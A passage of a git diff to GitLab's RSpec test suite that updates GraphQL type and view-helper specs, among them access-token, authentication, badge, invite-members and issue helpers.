100644 --- a/spec/graphql/types/range_input_type_spec.rb +++ b/spec/graphql/types/range_input_type_spec.rb @@ -24,7 +24,7 @@ RSpec.describe ::Types::RangeInputType do it 'follows expected subtyping relationships for instances' do context = GraphQL::Query::Context.new( - query: OpenStruct.new(schema: nil), + query: double('query', schema: nil), values: {}, object: nil ) diff --git a/spec/graphql/types/repository/blob_type_spec.rb b/spec/graphql/types/repository/blob_type_spec.rb index 7f37237f355..21bc88e34c0 100644 --- a/spec/graphql/types/repository/blob_type_spec.rb +++ b/spec/graphql/types/repository/blob_type_spec.rb @@ -24,10 +24,12 @@ RSpec.describe Types::Repository::BlobType do :raw_path, :replace_path, :pipeline_editor_path, + :code_owners, :simple_viewer, :rich_viewer, :plain_data, :can_modify_blob, + :can_current_user_push_to_branch, :ide_edit_path, :external_storage_url, :fork_and_edit_path, diff --git a/spec/graphql/types/subscription_type_spec.rb b/spec/graphql/types/subscription_type_spec.rb index b99df374bb3..bf933945a31 100644 --- a/spec/graphql/types/subscription_type_spec.rb +++ b/spec/graphql/types/subscription_type_spec.rb @@ -6,6 +6,7 @@ RSpec.describe GitlabSchema.types['Subscription'] do it 'has the expected fields' do expected_fields = %i[ issuable_assignees_updated + issue_crm_contacts_updated ] expect(described_class).to have_graphql_fields(*expected_fields).only diff --git a/spec/graphql/types/user_callout_feature_name_enum_spec.rb b/spec/graphql/types/user_callout_feature_name_enum_spec.rb index 28755e1301b..5dfcfc21708 100644 --- a/spec/graphql/types/user_callout_feature_name_enum_spec.rb +++ b/spec/graphql/types/user_callout_feature_name_enum_spec.rb @@ -6,6 +6,6 @@ RSpec.describe GitlabSchema.types['UserCalloutFeatureNameEnum'] do specify { expect(described_class.graphql_name).to eq('UserCalloutFeatureNameEnum') } it 'exposes all the existing user callout feature names' do - expect(described_class.values.keys).to 
match_array(::UserCallout.feature_names.keys.map(&:upcase)) + expect(described_class.values.keys).to match_array(::Users::Callout.feature_names.keys.map(&:upcase)) end end diff --git a/spec/helpers/access_tokens_helper_spec.rb b/spec/helpers/access_tokens_helper_spec.rb index 28041203447..c2c918bc6b0 100644 --- a/spec/helpers/access_tokens_helper_spec.rb +++ b/spec/helpers/access_tokens_helper_spec.rb @@ -15,4 +15,53 @@ RSpec.describe AccessTokensHelper do it { expect(helper.scope_description(prefix)).to eq(description_location) } end end + + describe '#tokens_app_data' do + let_it_be(:feed_token) { 'DUKu345VD73Py7zz3z89' } + let_it_be(:incoming_email_token) { 'az4a2l5f8ssa0zvdfbhidbzlx' } + let_it_be(:static_object_token) { 'QHXwGHYioHTgxQnAcyZ-' } + let_it_be(:feed_token_reset_path) { '/-/profile/reset_feed_token' } + let_it_be(:incoming_email_token_reset_path) { '/-/profile/reset_incoming_email_token' } + let_it_be(:static_object_token_reset_path) { '/-/profile/reset_static_object_token' } + let_it_be(:user) do + build( + :user, + feed_token: feed_token, + incoming_email_token: incoming_email_token, + static_object_token: static_object_token + ) + end + + it 'returns expected json' do + allow(Gitlab::CurrentSettings).to receive_messages( + disable_feed_token: false, + static_objects_external_storage_enabled?: true + ) + allow(Gitlab::IncomingEmail).to receive(:supports_issue_creation?).and_return(true) + allow(helper).to receive_messages( + current_user: user, + reset_feed_token_profile_path: feed_token_reset_path, + reset_incoming_email_token_profile_path: incoming_email_token_reset_path, + reset_static_object_token_profile_path: static_object_token_reset_path + ) + + expect(helper.tokens_app_data).to eq({ + feed_token: { + enabled: true, + token: feed_token, + reset_path: feed_token_reset_path + }, + incoming_email_token: { + enabled: true, + token: incoming_email_token, + reset_path: incoming_email_token_reset_path + }, + static_object_token: { + enabled: 
true, + token: static_object_token, + reset_path: static_object_token_reset_path + } + }.to_json) + end + end end diff --git a/spec/helpers/application_helper_spec.rb b/spec/helpers/application_helper_spec.rb index 7e3f665a99c..7390b9b3f58 100644 --- a/spec/helpers/application_helper_spec.rb +++ b/spec/helpers/application_helper_spec.rb @@ -192,20 +192,6 @@ RSpec.describe ApplicationHelper do end end - describe '#contact_sales_url' do - subject { helper.contact_sales_url } - - it 'returns the url' do - is_expected.to eq("https://#{helper.promo_host}/sales") - end - - it 'changes if promo_url changes' do - allow(helper).to receive(:promo_url).and_return('https://somewhere.else') - - is_expected.to eq('https://somewhere.else/sales') - end - end - describe '#support_url' do context 'when alternate support url is specified' do let(:alternate_url) { 'http://company.example.com/getting-help' } diff --git a/spec/helpers/auth_helper_spec.rb b/spec/helpers/auth_helper_spec.rb index c1c961c5cbb..b481c214ca1 100644 --- a/spec/helpers/auth_helper_spec.rb +++ b/spec/helpers/auth_helper_spec.rb @@ -283,35 +283,84 @@ RSpec.describe AuthHelper do before do allow(Gitlab).to receive(:com?).and_return(is_gitlab_com) - stub_config(extra: { google_tag_manager_id: 'key' }) allow(helper).to receive(:current_user).and_return(user) end - subject(:google_tag_manager_enabled?) { helper.google_tag_manager_enabled? } - - context 'on gitlab.com and a key set without a current user' do - it { is_expected.to be_truthy } - end + subject(:google_tag_manager_enabled) { helper.google_tag_manager_enabled? 
} context 'when not on gitlab.com' do let(:is_gitlab_com) { false } - it { is_expected.to be_falsey } + it { is_expected.to eq(false) } end - context 'when current user is set' do - let(:user) { instance_double('User') } + context 'regular and nonce versions' do + using RSpec::Parameterized::TableSyntax - it { is_expected.to be_falsey } + where(:gtm_nonce_enabled, :gtm_key) do + false | 'google_tag_manager_id' + true | 'google_tag_manager_nonce_id' + end + + with_them do + before do + stub_feature_flags(gtm_nonce: gtm_nonce_enabled) + stub_config(extra: { gtm_key => 'key' }) + end + + context 'on gitlab.com and a key set without a current user' do + it { is_expected.to be_truthy } + end + + context 'when current user is set' do + let(:user) { instance_double('User') } + + it { is_expected.to eq(false) } + end + + context 'when no key is set' do + before do + stub_config(extra: {}) + end + + it { is_expected.to eq(false) } + end + end end + end + + describe '#google_tag_manager_id' do + subject(:google_tag_manager_id) { helper.google_tag_manager_id } - context 'when no key is set' do + before do + stub_config(extra: { 'google_tag_manager_nonce_id': 'nonce', 'google_tag_manager_id': 'gtm' }) + end + + context 'when google tag manager is disabled' do before do - stub_config(extra: {}) + allow(helper).to receive(:google_tag_manager_enabled?).and_return(false) end it { is_expected.to be_falsey } end + + context 'when google tag manager is enabled' do + before do + allow(helper).to receive(:google_tag_manager_enabled?).and_return(true) + end + + context 'when nonce feature flag is enabled' do + it { is_expected.to eq('nonce') } + end + + context 'when nonce feature flag is disabled' do + before do + stub_feature_flags(gtm_nonce: false) + end + + it { is_expected.to eq('gtm') } + end + end end describe '#auth_app_owner_text' do @@ -346,4 +395,170 @@ RSpec.describe AuthHelper do end end end + + describe '#auth_strategy_class' do + subject(:auth_strategy_class) { 
helper.auth_strategy_class(name) } + + context 'when configuration specifies no provider' do + let(:name) { 'does_not_exist' } + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([]) + end + + it 'returns false' do + expect(auth_strategy_class).to be_falsey + end + end + + context 'when configuration specifies a provider with args but without strategy_class' do + let(:name) { 'google_oauth2' } + let(:provider) do + Struct.new(:name, :args).new( + name, + 'app_id' => 'YOUR_APP_ID' + ) + end + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([provider]) + end + + it 'returns false' do + expect(auth_strategy_class).to be_falsey + end + end + + context 'when configuration specifies a provider with args and strategy_class' do + let(:name) { 'provider1' } + let(:strategy) { 'OmniAuth::Strategies::LDAP' } + let(:provider) do + Struct.new(:name, :args).new( + name, + 'strategy_class' => strategy + ) + end + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([provider]) + end + + it 'returns the class' do + expect(auth_strategy_class).to eq(strategy) + end + end + + context 'when configuration specifies another provider with args and another strategy_class' do + let(:name) { 'provider1' } + let(:strategy) { 'OmniAuth::Strategies::LDAP' } + let(:provider) do + Struct.new(:name, :args).new( + 'another_name', + 'strategy_class' => strategy + ) + end + + before do + allow(Gitlab.config.omniauth).to receive(:providers).and_return([provider]) + end + + it 'returns false' do + expect(auth_strategy_class).to be_falsey + end + end + end + + describe '#saml_providers' do + subject(:saml_providers) { helper.saml_providers } + + let(:saml_strategy) { 'OmniAuth::Strategies::SAML' } + + let(:saml_provider_1_name) { 'saml_provider_1' } + let(:saml_provider_1) do + Struct.new(:name, :args).new( + saml_provider_1_name, + 'strategy_class' => saml_strategy + ) + end + + let(:saml_provider_2_name) { 
'saml_provider_2' } + let(:saml_provider_2) do + Struct.new(:name, :args).new( + saml_provider_2_name, + 'strategy_class' => saml_strategy + ) + end + + let(:ldap_provider_name) { 'ldap_provider' } + let(:ldap_strategy) { 'OmniAuth::Strategies::LDAP' } + let(:ldap_provider) do + Struct.new(:name, :args).new( + ldap_provider_name, + 'strategy_class' => ldap_strategy + ) + end + + let(:google_oauth2_provider_name) { 'google_oauth2' } + let(:google_oauth2_provider) do + Struct.new(:name, :args).new( + google_oauth2_provider_name, + 'app_id' => 'YOUR_APP_ID' + ) + end + + context 'when configuration specifies no provider' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([]) + end + + it 'returns an empty list' do + expect(saml_providers).to be_empty + end + end + + context 'when configuration specifies a provider with a SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([saml_provider_1_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([saml_provider_1]) + end + + it 'returns the provider' do + expect(saml_providers).to match_array([saml_provider_1_name]) + end + end + + context 'when configuration specifies two providers with a SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([saml_provider_1_name, saml_provider_2_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([saml_provider_1, saml_provider_2]) + end + + it 'returns the provider' do + expect(saml_providers).to match_array([saml_provider_1_name, saml_provider_2_name]) + end + end + + context 'when configuration specifies a provider with a non-SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([ldap_provider_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([ldap_provider]) + end + + it 'returns an empty list' do + 
expect(saml_providers).to be_empty + end + end + + context 'when configuration specifies four providers but only two with SAML strategy_class' do + before do + allow(Devise).to receive(:omniauth_providers).and_return([saml_provider_1_name, ldap_provider_name, saml_provider_2_name, google_oauth2_provider_name]) + allow(Gitlab.config.omniauth).to receive(:providers).and_return([saml_provider_1, ldap_provider, saml_provider_2, google_oauth2_provider]) + end + + it 'returns the provider' do + expect(saml_providers).to match_array([saml_provider_1_name, saml_provider_2_name]) + end + end + end end diff --git a/spec/helpers/badges_helper_spec.rb b/spec/helpers/badges_helper_spec.rb new file mode 100644 index 00000000000..5be3b4a737b --- /dev/null +++ b/spec/helpers/badges_helper_spec.rb @@ -0,0 +1,129 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BadgesHelper do + let(:label) { "Test" } + + describe '#gl_badge_tag' do + it 'creates a badge with given text' do + expect(helper.gl_badge_tag(label)).to match(%r{<span .*>Test</span>}) + end + + describe 'block content' do + it 'renders block content' do + expect(helper.gl_badge_tag { label }).to match(%r{<span .*>Test</span>}) + end + + it 'changes the function signature' do + options = { variant: :danger } + html_options = { class: 'foo-bar' } + + tag = helper.gl_badge_tag(label, options, html_options) + tag_with_block = helper.gl_badge_tag options, html_options do + label + end + + expect(tag).to eql(tag_with_block) + end + end + + it 'adds style classes' do + expect(helper.gl_badge_tag(label)).to match(%r{class="gl-badge badge badge-pill badge-muted md"}) + end + + it 'adds custom classes' do + expect(helper.gl_badge_tag(label, nil, class: "test-class" )).to match(%r{class=".*test-class.*"}) + end + + describe 'variants' do + where(:variant) do + [ + [:muted], + [:neutral], + [:info], + [:success], + [:warning], + [:danger] + ] + end + + with_them do + it 'sets the variant class' do + 
expected_class = "badge-#{variant}" + expect(helper.gl_badge_tag(label, variant: variant)).to match(%r{class=".*#{expected_class}.*"}) + end + end + + it 'defaults to muted' do + expect(helper.gl_badge_tag(label)).to match(%r{class=".*badge-muted.*"}) + end + + it 'falls back to default given an unknown variant' do + expect(helper.gl_badge_tag(label, variant: :foo)).to match(%r{class=".*badge-muted.*"}) + end + end + + describe 'sizes' do + where(:size) do + [[:sm], [:md], [:lg]] + end + + with_them do + it 'sets the size class' do + expect(helper.gl_badge_tag(label, size: size)).to match(%r{class=".*#{size}.*"}) + end + end + + it 'defaults to md' do + expect(helper.gl_badge_tag(label)).to match(%r{class=".*md.*"}) + end + + it 'falls back to default given an unknown size' do + expect(helper.gl_badge_tag(label, size: :foo)).to match(%r{class=".*md.*"}) + end + end + + it 'applies custom html attributes' do + expect(helper.gl_badge_tag(label, nil, data: { foo: "bar" })).to match(%r{<span .*data-foo="bar".*>}) + end + + describe 'icons' do + let(:spacing_class_regex) { %r{<svg .*class=".*gl-mr-2.*".*>.*</svg>} } + + describe 'with text' do + subject { helper.gl_badge_tag(label, icon: "question-o") } + + it 'renders an icon' do + expect(subject).to match(%r{<svg .*#question-o".*>.*</svg>}) + end + + it 'adds a spacing class to the icon' do + expect(subject).to match(spacing_class_regex) + end + end + + describe 'icon only' do + subject { helper.gl_badge_tag(label, icon: 'question-o', icon_only: true) } + + it 'adds an img role to element' do + expect(subject).to match(%r{<span .*role="img".*>}) + end + + it 'adds aria-label to element' do + expect(subject).to match(%r{<span .*aria-label="#{label}".*>}) + end + + it 'does not add a spacing class to the icon' do + expect(subject).not_to match(spacing_class_regex) + end + end + end + + describe 'given an href' do + it 'creates a badge link' do + expect(helper.gl_badge_tag(label, nil, href: 'foo')).to match(%r{<a 
.*href="foo".*>}) + end + end + end +end diff --git a/spec/helpers/ci/jobs_helper_spec.rb b/spec/helpers/ci/jobs_helper_spec.rb new file mode 100644 index 00000000000..e5ef362e91b --- /dev/null +++ b/spec/helpers/ci/jobs_helper_spec.rb @@ -0,0 +1,25 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::JobsHelper do + describe 'jobs data' do + let(:project) { create(:project, :repository) } + let(:bridge) { create(:ci_bridge, status: :pending) } + + subject(:bridge_data) { helper.bridge_data(bridge) } + + before do + allow(helper) + .to receive(:image_path) + .and_return('/path/to/illustration') + end + + it 'returns bridge data' do + expect(bridge_data).to eq({ + "build_name" => bridge.name, + "empty-state-illustration-path" => '/path/to/illustration' + }) + end + end +end diff --git a/spec/helpers/ide_helper_spec.rb b/spec/helpers/ide_helper_spec.rb index 503ad3ad66d..dc0a234f981 100644 --- a/spec/helpers/ide_helper_spec.rb +++ b/spec/helpers/ide_helper_spec.rb @@ -34,7 +34,7 @@ RSpec.describe IdeHelper do self.instance_variable_set(:@fork_info, fork_info) self.instance_variable_set(:@project, project) - serialized_project = API::Entities::Project.represent(project).to_json + serialized_project = API::Entities::Project.represent(project, current_user: project.creator).to_json expect(helper.ide_data) .to include( @@ -61,7 +61,7 @@ RSpec.describe IdeHelper do context 'and the callout has been dismissed' do it 'disables environment guidance' do - callout = create(:user_callout, feature_name: :web_ide_ci_environments_guidance, user: project.creator) + callout = create(:callout, feature_name: :web_ide_ci_environments_guidance, user: project.creator) callout.update!(dismissed_at: Time.now - 1.week) allow(helper).to receive(:current_user).and_return(User.find(project.creator.id)) expect(helper.ide_data).to include('enable-environments-guidance' => 'false') diff --git a/spec/helpers/invite_members_helper_spec.rb 
b/spec/helpers/invite_members_helper_spec.rb index 02f0416a17a..d8a97b93bc9 100644 --- a/spec/helpers/invite_members_helper_spec.rb +++ b/spec/helpers/invite_members_helper_spec.rb @@ -6,6 +6,7 @@ RSpec.describe InviteMembersHelper do include Devise::Test::ControllerHelpers let_it_be(:project) { create(:project) } + let_it_be(:group) { create(:group, projects: [project]) } let_it_be(:developer) { create(:user, developer_projects: [project]) } let(:owner) { project.owner } @@ -15,97 +16,24 @@ RSpec.describe InviteMembersHelper do end describe '#common_invite_modal_dataset' do - context 'when member_areas_of_focus is enabled', :experiment do - context 'with control experience' do - before do - stub_experiments(member_areas_of_focus: :control) - end - - it 'has expected attributes' do - attributes = { - areas_of_focus_options: [], - no_selection_areas_of_focus: [] - } - - expect(helper.common_invite_modal_dataset(project)).to include(attributes) - end - end - - context 'with candidate experience' do - before do - stub_experiments(member_areas_of_focus: :candidate) - end - - it 'has expected attributes', :aggregate_failures do - output = helper.common_invite_modal_dataset(project) - - expect(output[:no_selection_areas_of_focus]).to eq ['no_selection'] - expect(Gitlab::Json.parse(output[:areas_of_focus_options]).first['value']).to eq 'Contribute to the codebase' - end - end - end - - context 'when member_areas_of_focus is disabled' do - before do - stub_feature_flags(member_areas_of_focus: false) - end - - it 'has expected attributes' do - attributes = { - id: project.id, - name: project.name, - default_access_level: Gitlab::Access::GUEST, - areas_of_focus_options: [], - no_selection_areas_of_focus: [] - } - - expect(helper.common_invite_modal_dataset(project)).to include(attributes) - end + it 'has expected common attributes' do + attributes = { + id: project.id, + name: project.name, + default_access_level: Gitlab::Access::GUEST + } + + 
expect(helper.common_invite_modal_dataset(project)).to include(attributes) end context 'tasks_to_be_done' do - subject(:output) { helper.common_invite_modal_dataset(source) } - - let_it_be(:source) { project } - - before do - stub_experiments(invite_members_for_task: true) - end - - context 'when not logged in' do - before do - allow(helper).to receive(:params).and_return({ open_modal: 'invite_members_for_task' }) - end - - it "doesn't have the tasks to be done attributes" do - expect(output[:tasks_to_be_done_options]).to be_nil - expect(output[:projects]).to be_nil - expect(output[:new_project_path]).to be_nil - end - end + using RSpec::Parameterized::TableSyntax - context 'when logged in but the open_modal param is not present' do - before do - allow(helper).to receive(:current_user).and_return(developer) - end - - it "doesn't have the tasks to be done attributes" do - expect(output[:tasks_to_be_done_options]).to be_nil - expect(output[:projects]).to be_nil - expect(output[:new_project_path]).to be_nil - end - end - - context 'when logged in and the open_modal param is present' do - before do - allow(helper).to receive(:current_user).and_return(developer) - allow(helper).to receive(:params).and_return({ open_modal: 'invite_members_for_task' }) - end - - context 'for a group' do - let_it_be(:source) { create(:group, projects: [project]) } + subject(:output) { helper.common_invite_modal_dataset(source) } - it 'has the expected attributes', :aggregate_failures do + shared_examples_for 'including the tasks to be done attributes' do + it 'includes the tasks to be done attributes when expected' do + if expected? expect(output[:tasks_to_be_done_options]).to eq( [ { value: :code, text: 'Create/import code into a project (repository)' }, @@ -117,24 +45,70 @@ RSpec.describe InviteMembersHelper do [{ id: project.id, title: project.title }].to_json ) expect(output[:new_project_path]).to eq( - new_project_path(namespace_id: source.id) + source.is_a?(Project) ? 
'' : new_project_path(namespace_id: group.id) ) + else + expect(output[:tasks_to_be_done_options]).to be_nil + expect(output[:projects]).to be_nil + expect(output[:new_project_path]).to be_nil end end + end - context 'for a project' do - it 'has the expected attributes', :aggregate_failures do - expect(output[:tasks_to_be_done_options]).to eq( - [ - { value: :code, text: 'Create/import code into a project (repository)' }, - { value: :ci, text: 'Set up CI/CD pipelines to build, test, deploy, and monitor code' }, - { value: :issues, text: 'Create/import issues (tickets) to collaborate on ideas and plan work' } - ].to_json - ) - expect(output[:projects]).to eq( - [{ id: project.id, title: project.title }].to_json - ) - expect(output[:new_project_path]).to eq('') + context 'inviting members for tasks' do + where(:open_modal_param_present?, :logged_in?, :expected?) do + true | true | true + true | false | false + false | true | false + false | false | false + end + + with_them do + before do + allow(helper).to receive(:current_user).and_return(developer) if logged_in? + allow(helper).to receive(:params).and_return({ open_modal: 'invite_members_for_task' }) if open_modal_param_present? + end + + context 'when the source is a project' do + let_it_be(:source) { project } + + it_behaves_like 'including the tasks to be done attributes' + end + + context 'when the source is a group' do + let_it_be(:source) { group } + + it_behaves_like 'including the tasks to be done attributes' + end + end + end + + context 'the invite_for_help_continuous_onboarding experiment' do + where(:invite_for_help_continuous_onboarding?, :logged_in?, :expected?) do + true | true | true + true | false | false + false | true | false + false | false | false + end + + with_them do + before do + allow(helper).to receive(:current_user).and_return(developer) if logged_in? + stub_experiments(invite_for_help_continuous_onboarding: :candidate) if invite_for_help_continuous_onboarding? 
+ end + + context 'when the source is a project' do + let_it_be(:source) { project } + + it_behaves_like 'including the tasks to be done attributes' + end + + context 'when the source is a group' do + let_it_be(:source) { group } + + let(:expected?) { false } + + it_behaves_like 'including the tasks to be done attributes' end end end diff --git a/spec/helpers/issues_helper_spec.rb b/spec/helpers/issues_helper_spec.rb index 43b27dded3b..ad0ea6911f1 100644 --- a/spec/helpers/issues_helper_spec.rb +++ b/spec/helpers/issues_helper_spec.rb @@ -278,11 +278,13 @@ RSpec.describe IssuesHelper do it 'returns expected result' do expected = { can_create_issue: 'true', + can_destroy_issue: 'true', can_reopen_issue: 'true', can_report_spam: 'false', can_update_issue: 'true', iid: issue.iid, is_issue_author: 'false', + issue_path: issue_path(issue), issue_type: 'issue', new_issue_path: new_project_issue_path(project, { issue: { description: "Related to \##{issue.iid}.\n\n" } }), project_path: project.full_path, @@ -302,6 +304,7 @@ RSpec.describe IssuesHelper do allow(helper).to receive(:can?).and_return(true) allow(helper).to receive(:image_path).and_return('#') allow(helper).to receive(:import_csv_namespace_project_issues_path).and_return('#') + allow(helper).to receive(:issue_repositioning_disabled?).and_return(true) allow(helper).to receive(:url_for).and_return('#') expected = { @@ -318,6 +321,8 @@ RSpec.describe IssuesHelper do has_any_issues: project_issues(project).exists?.to_s, import_csv_issues_path: '#', initial_email: project.new_issuable_address(current_user, 'issue'), + is_anonymous_search_disabled: 'true', + is_issue_repositioning_disabled: 'true', is_project: 'true', is_signed_in: current_user.present?.to_s, jira_integration_path: help_page_url('integration/jira/issues', anchor: 'view-jira-issues'), @@ -338,6 +343,10 @@ RSpec.describe IssuesHelper do end describe '#project_issues_list_data' do + before do + stub_feature_flags(disable_anonymous_search: true) + end + 
context 'when user is signed in' do it_behaves_like 'issues list data' do let(:current_user) { double.as_null_object } diff --git a/spec/helpers/jira_connect_helper_spec.rb b/spec/helpers/jira_connect_helper_spec.rb index 55a5c724665..0f78185dc7d 100644 --- a/spec/helpers/jira_connect_helper_spec.rb +++ b/spec/helpers/jira_connect_helper_spec.rb @@ -19,7 +19,9 @@ RSpec.describe JiraConnectHelper do is_expected.to include( :groups_path, :subscriptions_path, - :users_path + :users_path, + :subscriptions, + :gitlab_user_path ) end @@ -32,6 +34,10 @@ RSpec.describe JiraConnectHelper do expect(subject[:groups_path]).to include("#{skip_groups_param}=#{subscription.namespace.id}") end + + it 'assigns gitlab_user_path to nil' do + expect(subject[:gitlab_user_path]).to be_nil + end end context 'user is logged in' do @@ -42,6 +48,10 @@ RSpec.describe JiraConnectHelper do it 'assigns users_path to nil' do expect(subject[:users_path]).to be_nil end + + it 'assigns gitlab_user_path correctly' do + expect(subject[:gitlab_user_path]).to eq(user_path(user)) + end end end end diff --git a/spec/helpers/learn_gitlab_helper_spec.rb b/spec/helpers/learn_gitlab_helper_spec.rb index b9f34853a77..9d13fc65de7 100644 --- a/spec/helpers/learn_gitlab_helper_spec.rb +++ b/spec/helpers/learn_gitlab_helper_spec.rb @@ -60,6 +60,7 @@ RSpec.describe LearnGitlabHelper do let(:onboarding_actions_data) { Gitlab::Json.parse(learn_gitlab_data[:actions]).deep_symbolize_keys } let(:onboarding_sections_data) { Gitlab::Json.parse(learn_gitlab_data[:sections]).deep_symbolize_keys } + let(:onboarding_project_data) { Gitlab::Json.parse(learn_gitlab_data[:project]).deep_symbolize_keys } shared_examples 'has all data' do it 'has all actions' do @@ -82,6 +83,11 @@ RSpec.describe LearnGitlabHelper do expect(onboarding_sections_data.keys).to contain_exactly(:deploy, :plan, :workspace) expect(onboarding_sections_data.values.map { |section| section.keys }).to match_array([[:svg]] * 3) end + + it 'has all project 
data', :aggregate_failures do + expect(onboarding_project_data.keys).to contain_exactly(:name) + expect(onboarding_project_data.values).to match_array([project.name]) + end end it_behaves_like 'has all data' diff --git a/spec/helpers/markup_helper_spec.rb b/spec/helpers/markup_helper_spec.rb index e946857ac77..ab2f6fa5b7e 100644 --- a/spec/helpers/markup_helper_spec.rb +++ b/spec/helpers/markup_helper_spec.rb @@ -321,7 +321,7 @@ RSpec.describe MarkupHelper do let(:context) do { pipeline: :wiki, project: project, wiki: wiki, - page_slug: 'nested/page', issuable_state_filter_enabled: true, + page_slug: 'nested/page', issuable_reference_expansion_enabled: true, repository: wiki_repository } end @@ -584,9 +584,9 @@ FooBar it 'preserves code color scheme' do object = create_object("```ruby\ndef test\n 'hello world'\nend\n```") - expected = "<pre class=\"code highlight js-syntax-highlight language-ruby\">" \ + expected = "\n<pre class=\"code highlight js-syntax-highlight language-ruby\">" \ "<code><span class=\"line\"><span class=\"k\">def</span> <span class=\"nf\">test</span>...</span>\n" \ - "</code></pre>" + "</code></pre>\n" expect(first_line_in_markdown(object, attribute, 150, project: project)).to eq(expected) end diff --git a/spec/helpers/namespaces_helper_spec.rb b/spec/helpers/namespaces_helper_spec.rb index 68bc19cb429..6eb560e3f5c 100644 --- a/spec/helpers/namespaces_helper_spec.rb +++ b/spec/helpers/namespaces_helper_spec.rb @@ -45,6 +45,39 @@ RSpec.describe NamespacesHelper do user_group.add_owner(user) end + describe '#namespaces_as_json' do + let(:result) { helper.namespaces_as_json(user) } + + before do + allow(helper).to receive(:current_user).and_return(user) + end + + it 'returns the user\'s groups' do + json_data = Gitlab::Json.parse(result) + + expect(result).to include('group') + expect(json_data['group']).to include( + "id" => user_group.id, + "name" => user_group.name, + "display_path" => user_group.full_path, + "human_name" => 
user_group.human_name + ) + end + + it 'returns the user\'s namespace' do + user_namespace = user.namespace + json_data = Gitlab::Json.parse(result) + + expect(result).to include('user') + expect(json_data['user']).to include( + "id" => user_namespace.id, + "name" => user_namespace.name, + "display_path" => user_namespace.full_path, + "human_name" => user_namespace.human_name + ) + end + end + describe '#namespaces_options' do context 'when admin mode is enabled', :enable_admin_mode do it 'returns groups without being a member for admin' do diff --git a/spec/helpers/nav/new_dropdown_helper_spec.rb b/spec/helpers/nav/new_dropdown_helper_spec.rb index 64f4d5ff797..ab206152e3d 100644 --- a/spec/helpers/nav/new_dropdown_helper_spec.rb +++ b/spec/helpers/nav/new_dropdown_helper_spec.rb @@ -13,8 +13,6 @@ RSpec.describe Nav::NewDropdownHelper do let(:with_can_create_project) { false } let(:with_can_create_group) { false } let(:with_can_create_snippet) { false } - let(:with_invite_members_experiment) { false } - let(:with_invite_members_experiment_enabled) { false } let(:subject) { helper.new_dropdown_view_model(project: current_project, group: current_group) } @@ -28,11 +26,6 @@ RSpec.describe Nav::NewDropdownHelper do end before do - allow(::Gitlab::Experimentation).to receive(:active?).with(:invite_members_new_dropdown) { with_invite_members_experiment } - allow(helper).to receive(:experiment_enabled?).with(:invite_members_new_dropdown) { with_invite_members_experiment_enabled } - allow(helper).to receive(:tracking_label) { 'test_tracking_label' } - allow(helper).to receive(:experiment_tracking_category_and_group) { |x| x } - allow(helper).to receive(:current_user) { current_user } allow(helper).to receive(:can?) 
{ false } @@ -42,38 +35,23 @@ RSpec.describe Nav::NewDropdownHelper do end shared_examples 'invite member link shared example' do - it 'shows invite member link' do + it 'shows invite member link with emoji' do expect(subject[:menu_sections]).to eq( expected_menu_section( title: expected_title, menu_item: ::Gitlab::Nav::TopNavMenuItem.build( id: 'invite', title: 'Invite members', + emoji: 'shaking_hands', href: expected_href, data: { - track_action: 'click_link', - track_label: 'test_tracking_label', - track_property: :invite_members_new_dropdown + track_action: 'click_link_invite_members', + track_label: 'plus_menu_dropdown' } ) ) ) end - - context 'with experiment enabled' do - let(:with_invite_members_experiment_enabled) { true } - - it 'shows emoji with invite member link' do - expect(subject[:menu_sections]).to match( - expected_menu_section( - title: expected_title, - menu_item: a_hash_including( - emoji: 'shaking_hands' - ) - ) - ) - end - end end it 'has title' do diff --git a/spec/helpers/notify_helper_spec.rb b/spec/helpers/notify_helper_spec.rb index a4193444528..e2a7a212b1b 100644 --- a/spec/helpers/notify_helper_spec.rb +++ b/spec/helpers/notify_helper_spec.rb @@ -55,53 +55,4 @@ RSpec.describe NotifyHelper do def reference_link(entity, url) "<a href=\"#{url}\">#{entity.to_reference}</a>" end - - describe '#invited_join_url' do - let_it_be(:member) { create(:project_member) } - - let(:token) { '_token_' } - - context 'when invite_email_preview_text is enabled', :experiment do - before do - stub_experiments(invite_email_preview_text: :control) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)) - .to eq("http://test.host/-/invites/#{token}?experiment_name=invite_email_preview_text&invite_type=initial_email") - end - - context 'when invite_email_from is enabled' do - before do - stub_experiments(invite_email_from: :control) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)) - .to 
eq("http://test.host/-/invites/#{token}?experiment_name=invite_email_from&invite_type=initial_email") - end - end - end - - context 'when invite_email_from is enabled' do - before do - stub_experiments(invite_email_from: :control) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)) - .to eq("http://test.host/-/invites/#{token}?experiment_name=invite_email_from&invite_type=initial_email") - end - end - - context 'when invite_email_preview_text is disabled' do - before do - stub_feature_flags(invite_email_preview_text: false) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)).to eq("http://test.host/-/invites/#{token}?invite_type=initial_email") - end - end - end end diff --git a/spec/helpers/numbers_helper_spec.rb b/spec/helpers/numbers_helper_spec.rb new file mode 100644 index 00000000000..a546f625ce8 --- /dev/null +++ b/spec/helpers/numbers_helper_spec.rb @@ -0,0 +1,31 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe NumbersHelper do + describe '#limited_counter_with_delimiter' do + using RSpec::Parameterized::TableSyntax + + subject { limited_counter_with_delimiter(resource, **options) } + + where(:count, :options, :expected_result) do + # Using explicit limit + 9 | { limit: 10 } | '9' + 10 | { limit: 10 } | '10' + 11 | { limit: 10 } | '10+' + 12 | { limit: 10 } | '10+' + # Using default limit + 999 | {} | '999' + 1000 | {} | '1,000' + 1001 | {} | '1,000+' + 1002 | {} | '1,000+' + end + + with_them do + let(:page) { double('page', total_count_with_limit: [count, options.fetch(:limit, 1000) 